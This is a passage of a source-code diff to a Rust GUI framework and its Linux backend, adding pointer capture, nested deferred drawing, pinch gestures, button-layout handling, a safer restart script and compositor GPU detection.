+ /// While captured, mouse events route to this hitbox regardless of hit testing. + captured_hitbox: Option, #[cfg(any(feature = "inspector", debug_assertions))] inspector: Option>, } @@ -1269,6 +1289,14 @@ impl Window { .log_err(); } })); + platform_window.on_button_layout_changed(Box::new({ + let mut cx = cx.to_async(); + move || { + handle + .update(&mut cx, |_, window, cx| window.button_layout_changed(cx)) + .log_err(); + } + })); platform_window.on_active_status_change(Box::new({ let mut cx = cx.to_async(); move |active| { @@ -1423,6 +1451,7 @@ impl Window { bounds_observers: SubscriberSet::new(), appearance, appearance_observers: SubscriberSet::new(), + button_layout_observers: SubscriberSet::new(), active, hovered, needs_present, @@ -1438,6 +1467,7 @@ impl Window { prompt: None, client_inset: None, image_cache_stack: Vec::new(), + captured_hitbox: None, #[cfg(any(feature = "inspector", debug_assertions))] inspector: None, }) @@ -1514,6 +1544,22 @@ impl Window { subscription } + /// Registers a callback to be invoked when the window button layout changes. + pub fn observe_button_layout_changed( + &self, + mut callback: impl FnMut(&mut Window, &mut App) + 'static, + ) -> Subscription { + let (subscription, activate) = self.button_layout_observers.insert( + (), + Box::new(move |window, cx| { + callback(window, cx); + true + }), + ); + activate(); + subscription + } + /// Replaces the root entity of the window with a new one. pub fn replace_root( &mut self, @@ -1887,7 +1933,12 @@ impl Window { }) } - fn bounds_changed(&mut self, cx: &mut App) { + /// Notify the window that its bounds have changed. + /// + /// This updates internal state like `viewport_size` and `scale_factor` from + /// the platform window, then notifies observers. Normally called automatically + /// by the platform's resize callback, but exposed publicly for test infrastructure. 
+ pub fn bounds_changed(&mut self, cx: &mut App) { self.scale_factor = self.platform_window.scale_factor(); self.viewport_size = self.platform_window.content_size(); self.display_id = self.platform_window.display().map(|display| display.id()); @@ -1931,6 +1982,12 @@ impl Window { .retain(&(), |callback| callback(self, cx)); } + pub(crate) fn button_layout_changed(&mut self, cx: &mut App) { + self.button_layout_observers + .clone() + .retain(&(), |callback| callback(self, cx)); + } + /// Returns the appearance of the current window. pub fn appearance(&self) -> WindowAppearance { self.appearance @@ -2143,6 +2200,26 @@ impl Window { self.mouse_position } + /// Captures the pointer for the given hitbox. While captured, all mouse move and mouse up + /// events will be routed to listeners that check this hitbox's `is_hovered` status, + /// regardless of actual hit testing. This enables drag operations that continue + /// even when the pointer moves outside the element's bounds. + /// + /// The capture is automatically released on mouse up. + pub fn capture_pointer(&mut self, hitbox_id: HitboxId) { + self.captured_hitbox = Some(hitbox_id); + } + + /// Releases any active pointer capture. + pub fn release_pointer(&mut self) { + self.captured_hitbox = None; + } + + /// Returns the hitbox that has captured the pointer, if any. 
+ pub fn captured_hitbox(&self) -> Option { + self.captured_hitbox + } + /// The current state of the keyboard's modifiers pub fn modifiers(&self) -> Modifiers { self.modifiers @@ -2299,10 +2376,7 @@ impl Window { #[cfg(any(feature = "inspector", debug_assertions))] let inspector_element = self.prepaint_inspector(_inspector_width, cx); - let mut sorted_deferred_draws = - (0..self.next_frame.deferred_draws.len()).collect::>(); - sorted_deferred_draws.sort_by_key(|ix| self.next_frame.deferred_draws[*ix].priority); - self.prepaint_deferred_draws(&sorted_deferred_draws, cx); + self.prepaint_deferred_draws(cx); let mut prompt_element = None; let mut active_drag_element = None; @@ -2331,7 +2405,7 @@ impl Window { #[cfg(any(feature = "inspector", debug_assertions))] self.paint_inspector(inspector_element, cx); - self.paint_deferred_draws(&sorted_deferred_draws, cx); + self.paint_deferred_draws(cx); if let Some(mut prompt_element) = prompt_element { prompt_element.paint(self, cx); @@ -2414,54 +2488,80 @@ impl Window { None } - fn prepaint_deferred_draws(&mut self, deferred_draw_indices: &[usize], cx: &mut App) { + fn prepaint_deferred_draws(&mut self, cx: &mut App) { assert_eq!(self.element_id_stack.len(), 0); - let mut deferred_draws = mem::take(&mut self.next_frame.deferred_draws); - for deferred_draw_ix in deferred_draw_indices { - let deferred_draw = &mut deferred_draws[*deferred_draw_ix]; - self.element_id_stack - .clone_from(&deferred_draw.element_id_stack); - self.text_style_stack - .clone_from(&deferred_draw.text_style_stack); - self.next_frame - .dispatch_tree - .set_active_node(deferred_draw.parent_node); + let mut completed_draws = Vec::new(); + + // Process deferred draws in multiple rounds to support nesting. + // Each round processes all current deferred draws, which may produce new ones. + let mut depth = 0; + loop { + // Limit maximum nesting depth to prevent infinite loops. 
+ assert!(depth < 10, "Exceeded maximum (10) deferred depth"); + depth += 1; + let deferred_count = self.next_frame.deferred_draws.len(); + if deferred_count == 0 { + break; + } - let prepaint_start = self.prepaint_index(); - if let Some(element) = deferred_draw.element.as_mut() { - self.with_rendered_view(deferred_draw.current_view, |window| { - window.with_rem_size(Some(deferred_draw.rem_size), |window| { - window.with_absolute_element_offset( - deferred_draw.absolute_offset, - |window| { - element.prepaint(window, cx); - }, - ); - }); - }) - } else { - self.reuse_prepaint(deferred_draw.prepaint_range.clone()); + // Sort by priority for this round + let traversal_order = self.deferred_draw_traversal_order(); + let mut deferred_draws = mem::take(&mut self.next_frame.deferred_draws); + + for deferred_draw_ix in traversal_order { + let deferred_draw = &mut deferred_draws[deferred_draw_ix]; + self.element_id_stack + .clone_from(&deferred_draw.element_id_stack); + self.text_style_stack + .clone_from(&deferred_draw.text_style_stack); + self.next_frame + .dispatch_tree + .set_active_node(deferred_draw.parent_node); + + let prepaint_start = self.prepaint_index(); + if let Some(element) = deferred_draw.element.as_mut() { + self.with_rendered_view(deferred_draw.current_view, |window| { + window.with_rem_size(Some(deferred_draw.rem_size), |window| { + window.with_absolute_element_offset( + deferred_draw.absolute_offset, + |window| { + element.prepaint(window, cx); + }, + ); + }); + }) + } else { + self.reuse_prepaint(deferred_draw.prepaint_range.clone()); + } + let prepaint_end = self.prepaint_index(); + deferred_draw.prepaint_range = prepaint_start..prepaint_end; } - let prepaint_end = self.prepaint_index(); - deferred_draw.prepaint_range = prepaint_start..prepaint_end; + + // Save completed draws and continue with newly added ones + completed_draws.append(&mut deferred_draws); + + self.element_id_stack.clear(); + self.text_style_stack.clear(); } - assert_eq!( - 
self.next_frame.deferred_draws.len(), - 0, - "cannot call defer_draw during deferred drawing" - ); - self.next_frame.deferred_draws = deferred_draws; - self.element_id_stack.clear(); - self.text_style_stack.clear(); + + // Restore all completed draws + self.next_frame.deferred_draws = completed_draws; } - fn paint_deferred_draws(&mut self, deferred_draw_indices: &[usize], cx: &mut App) { + fn paint_deferred_draws(&mut self, cx: &mut App) { assert_eq!(self.element_id_stack.len(), 0); + // Paint all deferred draws in priority order. + // Since prepaint has already processed nested deferreds, we just paint them all. + if self.next_frame.deferred_draws.len() == 0 { + return; + } + + let traversal_order = self.deferred_draw_traversal_order(); let mut deferred_draws = mem::take(&mut self.next_frame.deferred_draws); - for deferred_draw_ix in deferred_draw_indices { - let mut deferred_draw = &mut deferred_draws[*deferred_draw_ix]; + for deferred_draw_ix in traversal_order { + let mut deferred_draw = &mut deferred_draws[deferred_draw_ix]; self.element_id_stack .clone_from(&deferred_draw.element_id_stack); self.next_frame @@ -2469,10 +2569,13 @@ impl Window { .set_active_node(deferred_draw.parent_node); let paint_start = self.paint_index(); + let content_mask = deferred_draw.content_mask.clone(); if let Some(element) = deferred_draw.element.as_mut() { self.with_rendered_view(deferred_draw.current_view, |window| { - window.with_rem_size(Some(deferred_draw.rem_size), |window| { - element.paint(window, cx); + window.with_content_mask(content_mask, |window| { + window.with_rem_size(Some(deferred_draw.rem_size), |window| { + element.paint(window, cx); + }); }) }) } else { @@ -2485,6 +2588,13 @@ impl Window { self.element_id_stack.clear(); } + fn deferred_draw_traversal_order(&mut self) -> SmallVec<[usize; 8]> { + let deferred_count = self.next_frame.deferred_draws.len(); + let mut sorted_indices = (0..deferred_count).collect::>(); + sorted_indices.sort_by_key(|ix| 
self.next_frame.deferred_draws[*ix].priority); + sorted_indices + } + pub(crate) fn prepaint_index(&self) -> PrepaintStateIndex { PrepaintStateIndex { hitboxes_index: self.next_frame.hitboxes.len(), @@ -2536,6 +2646,7 @@ impl Window { parent_node: reused_subtree.refresh_node_id(deferred_draw.parent_node), element_id_stack: deferred_draw.element_id_stack.clone(), text_style_stack: deferred_draw.text_style_stack.clone(), + content_mask: deferred_draw.content_mask.clone(), rem_size: deferred_draw.rem_size, priority: deferred_draw.priority, element: None, @@ -3019,12 +3130,16 @@ impl Window { /// at a later time. The `priority` parameter determines the drawing order relative to other deferred elements, /// with higher values being drawn on top. /// + /// When `content_mask` is provided, the deferred element will be clipped to that region during + /// both prepaint and paint. When `None`, no additional clipping is applied. + /// /// This method should only be called as part of the prepaint phase of element drawing. pub fn defer_draw( &mut self, element: AnyElement, absolute_offset: Point, priority: usize, + content_mask: Option>, ) { self.invalidator.debug_assert_prepaint(); let parent_node = self.next_frame.dispatch_tree.active_node_id().unwrap(); @@ -3033,6 +3148,7 @@ impl Window { parent_node, element_id_stack: self.element_id_stack.clone(), text_style_stack: self.text_style_stack.clone(), + content_mask, rem_size: self.rem_size(), priority, element: Some(element), @@ -3282,6 +3398,100 @@ impl Window { Ok(()) } + /// Paints a monochrome glyph with pre-computed raster bounds. + /// + /// This is faster than `paint_glyph` because it skips the per-glyph cache lookup. + /// Use `ShapedLine::compute_glyph_raster_data` to batch-compute raster bounds during prepaint. 
+ pub fn paint_glyph_with_raster_bounds( + &mut self, + origin: Point, + _font_id: FontId, + _glyph_id: GlyphId, + _font_size: Pixels, + color: Hsla, + raster_bounds: Bounds, + params: &RenderGlyphParams, + ) -> Result<()> { + self.invalidator.debug_assert_paint(); + + let element_opacity = self.element_opacity(); + let scale_factor = self.scale_factor(); + let glyph_origin = origin.scale(scale_factor); + + if !raster_bounds.is_zero() { + let tile = self + .sprite_atlas + .get_or_insert_with(¶ms.clone().into(), &mut || { + let (size, bytes) = self.text_system().rasterize_glyph(params)?; + Ok(Some((size, Cow::Owned(bytes)))) + })? + .expect("Callback above only errors or returns Some"); + let bounds = Bounds { + origin: glyph_origin.map(|px| px.floor()) + raster_bounds.origin.map(Into::into), + size: tile.bounds.size.map(Into::into), + }; + let content_mask = self.content_mask().scale(scale_factor); + self.next_frame.scene.insert_primitive(MonochromeSprite { + order: 0, + pad: 0, + bounds, + content_mask, + color: color.opacity(element_opacity), + tile, + transformation: TransformationMatrix::unit(), + }); + } + Ok(()) + } + + /// Paints an emoji glyph with pre-computed raster bounds. + /// + /// This is faster than `paint_emoji` because it skips the per-glyph cache lookup. + /// Use `ShapedLine::compute_glyph_raster_data` to batch-compute raster bounds during prepaint. + pub fn paint_emoji_with_raster_bounds( + &mut self, + origin: Point, + _font_id: FontId, + _glyph_id: GlyphId, + _font_size: Pixels, + raster_bounds: Bounds, + params: &RenderGlyphParams, + ) -> Result<()> { + self.invalidator.debug_assert_paint(); + + let scale_factor = self.scale_factor(); + let glyph_origin = origin.scale(scale_factor); + + if !raster_bounds.is_zero() { + let tile = self + .sprite_atlas + .get_or_insert_with(¶ms.clone().into(), &mut || { + let (size, bytes) = self.text_system().rasterize_glyph(params)?; + Ok(Some((size, Cow::Owned(bytes)))) + })? 
+ .expect("Callback above only errors or returns Some"); + + let bounds = Bounds { + origin: glyph_origin.map(|px| px.floor()) + raster_bounds.origin.map(Into::into), + size: tile.bounds.size.map(Into::into), + }; + let content_mask = self.content_mask().scale(scale_factor); + let opacity = self.element_opacity(); + + self.next_frame.scene.insert_primitive(PolychromeSprite { + order: 0, + pad: 0, + grayscale: false, + bounds, + corner_radii: Default::default(), + content_mask, + tile, + opacity, + }); + } + Ok(()) + } + fn should_use_subpixel_rendering(&self, font_id: FontId, font_size: Pixels) -> bool { if self.platform_window.background_appearance() != WindowBackgroundAppearance::Opaque { return false; @@ -3883,14 +4093,18 @@ impl Window { /// Dispatch a mouse or keyboard event on the window. #[profiling::function] pub fn dispatch_event(&mut self, event: PlatformInput, cx: &mut App) -> DispatchEventResult { - // Track whether this input was keyboard-based for focus-visible styling + // Track input modality for focus-visible styling and hover suppression. + // Hover is suppressed during keyboard modality so that keyboard navigation + // doesn't show hover highlights on the item under the mouse cursor. + let old_modality = self.last_input_modality; self.last_input_modality = match &event { - PlatformInput::KeyDown(_) | PlatformInput::ModifiersChanged(_) => { - InputModality::Keyboard - } - PlatformInput::MouseDown(e) if e.is_focusing() => InputModality::Mouse, + PlatformInput::KeyDown(_) => InputModality::Keyboard, + PlatformInput::MouseMove(_) | PlatformInput::MouseDown(_) => InputModality::Mouse, _ => self.last_input_modality, }; + if self.last_input_modality != old_modality { + self.refresh(); + } // Handlers may set this to false by calling `stop_propagation`. 
cx.propagate_event = true; @@ -3932,6 +4146,11 @@ impl Window { self.modifiers = scroll_wheel.modifiers; PlatformInput::ScrollWheel(scroll_wheel) } + PlatformInput::Pinch(pinch) => { + self.mouse_position = pinch.position; + self.modifiers = pinch.modifiers; + PlatformInput::Pinch(pinch) + } // Translate dragging and dropping of external files from the operating system // to internal drag and drop events. PlatformInput::FileDrop(file_drop) => match file_drop { @@ -4044,6 +4263,11 @@ impl Window { self.refresh(); } } + + // Auto-release pointer capture on mouse up + if event.is::() && self.captured_hitbox.is_some() { + self.captured_hitbox = None; + } } fn dispatch_key_event(&mut self, event: &dyn Any, cx: &mut App) { @@ -4800,6 +5024,12 @@ impl Window { .set_tabbing_identifier(tabbing_identifier) } + /// Request the OS to play an alert sound. On some platforms this is associated + /// with the window, for others it's just a simple global function call. + pub fn play_system_bell(&self) { + self.platform_window.play_system_bell() + } + /// Toggles the inspector mode on this window. #[cfg(any(feature = "inspector", debug_assertions))] pub fn toggle_inspector(&mut self, cx: &mut App) { @@ -5266,6 +5496,8 @@ pub enum ElementId { CodeLocation(core::panic::Location<'static>), /// A labeled child of an element. 
NamedChild(Arc, SharedString), + /// A byte array ID (used for text-anchors) + OpaqueId([u8; 20]), } impl ElementId { @@ -5287,6 +5519,7 @@ impl Display for ElementId { ElementId::Path(path) => write!(f, "{}", path.display())?, ElementId::CodeLocation(location) => write!(f, "{}", location)?, ElementId::NamedChild(id, name) => write!(f, "{}-{}", id, name)?, + ElementId::OpaqueId(opaque_id) => write!(f, "{:x?}", opaque_id)?, } Ok(()) @@ -5401,6 +5634,12 @@ impl From<&'static core::panic::Location<'static>> for ElementId { } } +impl From<[u8; 20]> for ElementId { + fn from(opaque_id: [u8; 20]) -> Self { + ElementId::OpaqueId(opaque_id) + } +} + /// A rectangle to be rendered in the window at the given position and size. /// Passed as an argument [`Window::paint_quad`]. #[derive(Clone)] diff --git a/crates/gpui_linux/Cargo.toml b/crates/gpui_linux/Cargo.toml index 08c759125a7600f94867cff95035d0318f26305a..9078fa82c2884421c6cd11c6d3384645621b7e6f 100644 --- a/crates/gpui_linux/Cargo.toml +++ b/crates/gpui_linux/Cargo.toml @@ -121,6 +121,7 @@ x11rb = { version = "0.13.1", features = [ "cursor", "resource_manager", "sync", + "dri3", ], optional = true } # WARNING: If you change this, you must also publish a new version of zed-xim to crates.io xim = { git = "https://github.com/zed-industries/xim-rs.git", rev = "16f35a2c881b815a2b6cdfd6687988e84f8447d8", features = [ diff --git a/crates/gpui_linux/src/linux/dispatcher.rs b/crates/gpui_linux/src/linux/dispatcher.rs index ff17fd238ae2a4b40ebdf8e36133c05f3e41f9b3..22df5799ddf9c77bfdbc7b09accbea117de6d130 100644 --- a/crates/gpui_linux/src/linux/dispatcher.rs +++ b/crates/gpui_linux/src/linux/dispatcher.rs @@ -13,7 +13,7 @@ use std::{ use gpui::{ GLOBAL_THREAD_TIMINGS, PlatformDispatcher, Priority, PriorityQueueReceiver, - PriorityQueueSender, RunnableVariant, THREAD_TIMINGS, TaskTiming, ThreadTaskTimings, profiler, + PriorityQueueSender, RunnableVariant, TaskTiming, ThreadTaskTimings, profiler, }; struct TimerAfter { @@ -44,11 
+44,6 @@ impl LinuxDispatcher { .name(format!("Worker-{i}")) .spawn(move || { for runnable in receiver.iter() { - // Check if the executor that spawned this task was closed - if runnable.metadata().is_closed() { - continue; - } - let start = Instant::now(); let location = runnable.metadata().location; @@ -94,11 +89,6 @@ impl LinuxDispatcher { calloop::timer::Timer::from_duration(timer.duration), move |_, _, _| { if let Some(runnable) = runnable.take() { - // Check if the executor that spawned this task was closed - if runnable.metadata().is_closed() { - return TimeoutAction::Drop; - } - let start = Instant::now(); let location = runnable.metadata().location; let mut timing = TaskTiming { @@ -145,25 +135,7 @@ impl PlatformDispatcher for LinuxDispatcher { } fn get_current_thread_timings(&self) -> gpui::ThreadTaskTimings { - THREAD_TIMINGS.with(|timings| { - let timings = timings.lock(); - let thread_name = timings.thread_name.clone(); - let total_pushed = timings.total_pushed; - let timings = &timings.timings; - - let mut vec = Vec::with_capacity(timings.len()); - - let (s1, s2) = timings.as_slices(); - vec.extend_from_slice(s1); - vec.extend_from_slice(s2); - - gpui::ThreadTaskTimings { - thread_name, - thread_id: std::thread::current().id(), - timings: vec, - total_pushed, - } - }) + gpui::profiler::get_current_thread_task_timings() } fn is_main_thread(&self) -> bool { diff --git a/crates/gpui_linux/src/linux/headless/client.rs b/crates/gpui_linux/src/linux/headless/client.rs index 6dbdc556751b27d144feb4a40c916910bc6ff5f7..56cc9e8df008abcb0904c7178e5b333eaade1d84 100644 --- a/crates/gpui_linux/src/linux/headless/client.rs +++ b/crates/gpui_linux/src/linux/headless/client.rs @@ -64,6 +64,7 @@ impl LinuxClient for HeadlessClient { None } + #[cfg(feature = "screen-capture")] fn screen_capture_sources( &self, ) -> futures::channel::oneshot::Receiver>>> diff --git a/crates/gpui_linux/src/linux/platform.rs b/crates/gpui_linux/src/linux/platform.rs index 
f044b086a580ea70ef2b959ed5e8a0931f4ce4e9..e3c947bcb9d33389faa354df1a83ae6419650ba8 100644 --- a/crates/gpui_linux/src/linux/platform.rs +++ b/crates/gpui_linux/src/linux/platform.rs @@ -26,7 +26,8 @@ use gpui::{ Action, AnyWindowHandle, BackgroundExecutor, ClipboardItem, CursorStyle, DisplayId, ForegroundExecutor, Keymap, Menu, MenuItem, OwnedMenu, PathPromptOptions, Platform, PlatformDisplay, PlatformKeyboardLayout, PlatformKeyboardMapper, PlatformTextSystem, - PlatformWindow, Result, RunnableVariant, Task, ThermalState, WindowAppearance, WindowParams, + PlatformWindow, Result, RunnableVariant, Task, ThermalState, WindowAppearance, + WindowButtonLayout, WindowParams, }; #[cfg(any(feature = "wayland", feature = "x11"))] use gpui::{Pixels, Point, px}; @@ -55,12 +56,12 @@ pub(crate) trait LinuxClient { fn display(&self, id: DisplayId) -> Option>; fn primary_display(&self) -> Option>; - #[allow(dead_code)] + #[cfg(feature = "screen-capture")] fn is_screen_capture_supported(&self) -> bool { - false + true } - #[allow(dead_code)] + #[cfg(feature = "screen-capture")] fn screen_capture_sources( &self, ) -> oneshot::Receiver>>> { @@ -114,6 +115,7 @@ pub(crate) struct LinuxCommon { pub(crate) text_system: Arc, pub(crate) appearance: WindowAppearance, pub(crate) auto_hide_scrollbars: bool, + pub(crate) button_layout: WindowButtonLayout, pub(crate) callbacks: PlatformHandlers, pub(crate) signal: LoopSignal, pub(crate) menus: Vec, @@ -140,6 +142,7 @@ impl LinuxCommon { text_system, appearance: WindowAppearance::Light, auto_hide_scrollbars: false, + button_layout: WindowButtonLayout::linux_default(), callbacks, signal, menus: Vec::new(), @@ -229,17 +232,14 @@ impl Platform for LinuxPlatform

{ log::info!("Restarting process, using app path: {:?}", app_path); // Script to wait for the current process to exit and then restart the app. - let script = format!( - r#" - while kill -0 {pid} 2>/dev/null; do + // Pass dynamic values as positional parameters to avoid shell interpolation issues. + let script = r#" + while kill -0 "$0" 2>/dev/null; do sleep 0.1 done - {app_path} - "#, - pid = app_pid, - app_path = app_path.display() - ); + "$1" + "#; #[allow( clippy::disallowed_methods, @@ -249,6 +249,8 @@ impl Platform for LinuxPlatform

{ .arg("bash") .arg("-c") .arg(script) + .arg(&app_pid) + .arg(&app_path) .process_group(0) .spawn(); @@ -602,6 +604,10 @@ impl Platform for LinuxPlatform

{ self.inner.with_common(|common| common.appearance) } + fn button_layout(&self) -> Option { + Some(self.inner.with_common(|common| common.button_layout)) + } + fn register_url_scheme(&self, _: &str) -> Task> { Task::ready(Err(anyhow!("register_url_scheme unimplemented"))) } @@ -634,28 +640,42 @@ pub(super) fn open_uri_internal( if let Some(uri) = ashpd::Uri::parse(uri).log_err() { executor .spawn(async move { - match ashpd::desktop::open_uri::OpenFileRequest::default() - .activation_token(activation_token.clone().map(ashpd::ActivationToken::from)) - .send_uri(&uri) - .await - .and_then(|e| e.response()) - { - Ok(()) => return, - Err(e) => log::error!("Failed to open with dbus: {}", e), - } - + let mut xdg_open_failed = false; for mut command in open::commands(uri.to_string()) { if let Some(token) = activation_token.as_ref() { command.env("XDG_ACTIVATION_TOKEN", token); } let program = format!("{:?}", command.get_program()); match smol::process::Command::from(command).spawn() { - Ok(mut cmd) => { - cmd.status().await.log_err(); - return; + Ok(mut cmd) => match cmd.status().await { + Ok(status) if status.success() => return, + Ok(status) => { + log::error!("Command {} exited with status: {}", program, status); + xdg_open_failed = true; + } + Err(e) => { + log::error!("Failed to get status from {}: {}", program, e); + xdg_open_failed = true; + } + }, + Err(e) => { + log::error!("Failed to open with {}: {}", program, e); + xdg_open_failed = true; } + } + } + + if xdg_open_failed { + match ashpd::desktop::open_uri::OpenFileRequest::default() + .activation_token(activation_token.map(ashpd::ActivationToken::from)) + .send_uri(&uri) + .await + .and_then(|e| e.response()) + { + Ok(()) => {} + Err(ashpd::Error::Response(ashpd::desktop::ResponseError::Cancelled)) => {} Err(e) => { - log::error!("Failed to open with {}: {}", program, e) + log::error!("Failed to open with dbus: {}", e); } } } @@ -1038,6 +1058,46 @@ pub(super) fn capslock_from_xkb(keymap_state: &State) -> 
gpui::Capslock { gpui::Capslock { on } } +/// Resolve a Linux `dev_t` to PCI vendor/device IDs via sysfs, returning a +/// [`CompositorGpuHint`] that the GPU adapter selection code can use to +/// prioritize the compositor's rendering device. +#[cfg(any(feature = "wayland", feature = "x11"))] +pub(super) fn compositor_gpu_hint_from_dev_t(dev: u64) -> Option { + fn dev_major(dev: u64) -> u32 { + ((dev >> 8) & 0xfff) as u32 | (((dev >> 32) & !0xfff) as u32) + } + + fn dev_minor(dev: u64) -> u32 { + (dev & 0xff) as u32 | (((dev >> 12) & !0xff) as u32) + } + + fn read_sysfs_hex_id(path: &str) -> Option { + let content = std::fs::read_to_string(path).ok()?; + let trimmed = content.trim().strip_prefix("0x").unwrap_or(content.trim()); + u32::from_str_radix(trimmed, 16).ok() + } + + let major = dev_major(dev); + let minor = dev_minor(dev); + + let vendor_path = format!("/sys/dev/char/{major}:{minor}/device/vendor"); + let device_path = format!("/sys/dev/char/{major}:{minor}/device/device"); + + let vendor_id = read_sysfs_hex_id(&vendor_path)?; + let device_id = read_sysfs_hex_id(&device_path)?; + + log::info!( + "Compositor GPU hint: vendor={:#06x}, device={:#06x} (from dev {major}:{minor})", + vendor_id, + device_id, + ); + + Some(gpui_wgpu::CompositorGpuHint { + vendor_id, + device_id, + }) +} + #[cfg(test)] mod tests { use super::*; diff --git a/crates/gpui_linux/src/linux/wayland/client.rs b/crates/gpui_linux/src/linux/wayland/client.rs index a810a00af642c3a252a9a144b884837f82eac7e7..10f4aab0db19978302143519dd6e2a7e4d25ec4d 100644 --- a/crates/gpui_linux/src/linux/wayland/client.rs +++ b/crates/gpui_linux/src/linux/wayland/client.rs @@ -36,6 +36,9 @@ use wayland_client::{ wl_shm_pool, wl_surface, }, }; +use wayland_protocols::wp::pointer_gestures::zv1::client::{ + zwp_pointer_gesture_pinch_v1, zwp_pointer_gestures_v1, +}; use wayland_protocols::wp::primary_selection::zv1::client::zwp_primary_selection_offer_v1::{ self, ZwpPrimarySelectionOfferV1, }; @@ -55,6 +58,7 @@ 
use wayland_protocols::xdg::decoration::zv1::client::{ zxdg_decoration_manager_v1, zxdg_toplevel_decoration_v1, }; use wayland_protocols::xdg::shell::client::{xdg_surface, xdg_toplevel, xdg_wm_base}; +use wayland_protocols::xdg::system_bell::v1::client::xdg_system_bell_v1; use wayland_protocols::{ wp::cursor_shape::v1::client::{wp_cursor_shape_device_v1, wp_cursor_shape_manager_v1}, xdg::dialog::v1::client::xdg_wm_dialog_v1::{self, XdgWmDialogV1}, @@ -92,10 +96,13 @@ use gpui::{ ForegroundExecutor, KeyDownEvent, KeyUpEvent, Keystroke, Modifiers, ModifiersChangedEvent, MouseButton, MouseDownEvent, MouseExitEvent, MouseMoveEvent, MouseUpEvent, NavigationDirection, Pixels, PlatformDisplay, PlatformInput, PlatformKeyboardLayout, PlatformWindow, Point, - ScrollDelta, ScrollWheelEvent, SharedString, Size, TaskTiming, TouchPhase, WindowParams, point, - profiler, px, size, + ScrollDelta, ScrollWheelEvent, SharedString, Size, TaskTiming, TouchPhase, WindowButtonLayout, + WindowParams, point, profiler, px, size, +}; +use gpui_wgpu::{CompositorGpuHint, GpuContext}; +use wayland_protocols::wp::linux_dmabuf::zv1::client::{ + zwp_linux_dmabuf_feedback_v1, zwp_linux_dmabuf_v1, }; -use gpui_wgpu::WgpuContext; /// Used to convert evdev scancode to xkb scancode const MIN_KEYCODE: u32 = 8; @@ -121,7 +128,9 @@ pub struct Globals { pub layer_shell: Option, pub blur_manager: Option, pub text_input_manager: Option, + pub gesture_manager: Option, pub dialog: Option, + pub system_bell: Option, pub executor: ForegroundExecutor, } @@ -161,7 +170,9 @@ impl Globals { layer_shell: globals.bind(&qh, 1..=5, ()).ok(), blur_manager: globals.bind(&qh, 1..=1, ()).ok(), text_input_manager: globals.bind(&qh, 1..=1, ()).ok(), + gesture_manager: globals.bind(&qh, 1..=3, ()).ok(), dialog: globals.bind(&qh, dialog_v..=dialog_v, ()).ok(), + system_bell: globals.bind(&qh, 1..=1, ()).ok(), executor, qh, } @@ -201,9 +212,12 @@ pub struct Output { pub(crate) struct WaylandClientState { serial_tracker: 
SerialTracker, globals: Globals, - pub gpu_context: Option, + pub gpu_context: GpuContext, + pub compositor_gpu: Option, wl_seat: wl_seat::WlSeat, // TODO: Multi seat support wl_pointer: Option, + pinch_gesture: Option, + pinch_scale: f32, wl_keyboard: Option, cursor_shape_device: Option, data_device: Option, @@ -217,6 +231,7 @@ pub(crate) struct WaylandClientState { // Output to scale mapping outputs: HashMap, in_progress_outputs: HashMap, + wl_outputs: HashMap, keyboard_layout: LinuxKeyboardLayout, keymap_state: Option, compose_state: Option, @@ -459,6 +474,8 @@ impl WaylandClient { let mut seat: Option = None; #[allow(clippy::mutable_key_type)] let mut in_progress_outputs = HashMap::default(); + #[allow(clippy::mutable_key_type)] + let mut wl_outputs: HashMap = HashMap::default(); globals.contents().with_list(|list| { for global in list { match &global.interface[..] { @@ -478,6 +495,7 @@ impl WaylandClient { (), ); in_progress_outputs.insert(output.id(), InProgressOutput::default()); + wl_outputs.insert(output.id(), output); } _ => {} } @@ -515,7 +533,8 @@ impl WaylandClient { }) .unwrap(); - let gpu_context = None; + let compositor_gpu = detect_compositor_gpu(); + let gpu_context = Rc::new(RefCell::new(None)); let seat = seat.unwrap(); let globals = Globals::new( @@ -551,6 +570,19 @@ impl WaylandClient { } } } + XDPEvent::ButtonLayout(layout_str) => { + if let Some(client) = client.0.upgrade() { + let layout = WindowButtonLayout::parse(&layout_str) + .log_err() + .unwrap_or_else(WindowButtonLayout::linux_default); + let mut client = client.borrow_mut(); + client.common.button_layout = layout; + + for window in client.windows.values_mut() { + window.set_button_layout(); + } + } + } XDPEvent::CursorTheme(theme) => { if let Some(client) = client.0.upgrade() { let mut client = client.borrow_mut(); @@ -571,9 +603,12 @@ impl WaylandClient { serial_tracker: SerialTracker::new(), globals, gpu_context, + compositor_gpu, wl_seat: seat, wl_pointer: None, wl_keyboard: 
None, + pinch_gesture: None, + pinch_scale: 1.0, cursor_shape_device: None, data_device, primary_selection, @@ -583,6 +618,7 @@ impl WaylandClient { composing: false, outputs: HashMap::default(), in_progress_outputs, + wl_outputs, windows: HashMap::default(), common, keyboard_layout: LinuxKeyboardLayout::new(UNKNOWN_KEYBOARD_LAYOUT_NAME), @@ -682,11 +718,6 @@ impl LinuxClient for WaylandClient { None } - #[cfg(feature = "screen-capture")] - fn is_screen_capture_supported(&self) -> bool { - false - } - #[cfg(feature = "screen-capture")] fn screen_capture_sources( &self, @@ -714,15 +745,27 @@ impl LinuxClient for WaylandClient { let parent = state.keyboard_focused_window.clone(); + let target_output = params.display_id.and_then(|display_id| { + let target_protocol_id: u32 = display_id.into(); + state + .wl_outputs + .iter() + .find(|(id, _)| id.protocol_id() == target_protocol_id) + .map(|(_, output)| output.clone()) + }); + let appearance = state.common.appearance; + let compositor_gpu = state.compositor_gpu.take(); let (window, surface_id) = WaylandWindow::new( handle, state.globals.clone(), - &mut state.gpu_context, + state.gpu_context.clone(), + compositor_gpu, WaylandClientStatePtr(Rc::downgrade(&self.0)), params, appearance, parent, + target_output, )?; state.windows.insert(surface_id, window.0.clone()); @@ -835,7 +878,9 @@ impl LinuxClient for WaylandClient { }; if state.mouse_focused_window.is_some() || state.keyboard_focused_window.is_some() { state.clipboard.set_primary(item); - let serial = state.serial_tracker.get(SerialKind::KeyPress); + let serial = state + .serial_tracker + .latest_of(&[SerialKind::KeyPress, SerialKind::MousePress]); let data_source = primary_selection_manager.create_source(&state.globals.qh, ()); for mime_type in TEXT_MIME_TYPES { data_source.offer(mime_type.to_string()); @@ -855,7 +900,9 @@ impl LinuxClient for WaylandClient { }; if state.mouse_focused_window.is_some() || state.keyboard_focused_window.is_some() { 
